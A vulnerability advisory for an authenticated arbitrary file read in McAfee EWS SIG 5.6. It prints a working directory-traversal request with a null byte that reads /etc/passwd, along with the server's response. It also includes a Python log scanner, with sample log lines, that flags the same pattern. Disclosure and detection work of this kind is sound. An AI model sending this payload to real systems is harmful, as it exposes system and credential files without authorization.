McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerability Title: McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerable System:

  • McAfee EWS SIG 5.6 1741.115

Description:

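The application is vulnerable to a local file inclusion vulnerability. The report parameter of the report download handler accepts directory traversal sequences followed by a null byte, which lets an authenticated, low-privileged user read arbitrary files from the appliance, as the request and response below show.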

Exploit:

Request:

/scmadmin/29836/cgi-bin/handle_download/report_download/Overview.pdf?report=../../../../../../../../../../../../../../../../etc/passwd%00overview&type=PDF

Response:

HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 00:58:50 GMT
Server: Apache/2.0.63 (Unix)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/pdf;
Content-Length: 763

# Copyright (C) 2007 McAfee Inc. All rights reserved.
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
mail:x:8:12:mail:/var/spool/mail:
uucp:x:10:14:uucp:/:
….

Impact: Impact is low, because valid credentials are needed to exploit the vulnerability.

Recommendation:

No response from McAfee to the submission.
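
With no vendor response, one way to look for this request pattern in the appliance's web access logs is sketched below. This is an added example, not part of the original advisory or any McAfee code; it assumes Apache common/combined log format and a variable numeric path segment, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Handler path from the advisory; assumption: the numeric segment varies.
HANDLER = re.compile(r"^/scmadmin/\d+/cgi-bin/handle_download/")
# Assumption: Apache common/combined log format, request line in quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised too."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def check_request(uri):
    """Return the reasons a URI matches the advisory's request pattern."""
    parts = urlsplit(uri)
    if not HANDLER.match(parts.path):
        return []
    reasons = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != "report":
            continue
        value = decode_fully(value).replace("\\", "/")
        if "\x00" in value:
            reasons.append("null byte in report")
        if ".." in value.split("/"):
            reasons.append("directory traversal in report")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = check_request(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [14/Dec/2012:00:57:01 +0000] "GET /scmadmin/29836/cgi-bin/handle_download/report_download/Overview.pdf?report=overview&type=PDF HTTP/1.1" 200 48211',
    '192.0.2.23 - viewer [14/Dec/2012:00:58:50 +0000] "GET /scmadmin/29836/cgi-bin/handle_download/report_download/Overview.pdf?report=../../etc/passwd%00overview&type=PDF HTTP/1.1" 200 763',
    '192.0.2.23 - viewer [14/Dec/2012:00:59:12 +0000] "GET /scmadmin/29836/cgi-bin/handle_download/report_download/Overview.pdf?report=%2e%2e%2f%2e%2e%2fetc%2fpasswd&type=PDF HTTP/1.1" 200 763',
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A 200 response with Content-Type application/pdf and a small Content-Length, as in the response above, is a useful secondary signal when triaging flagged lines.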

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.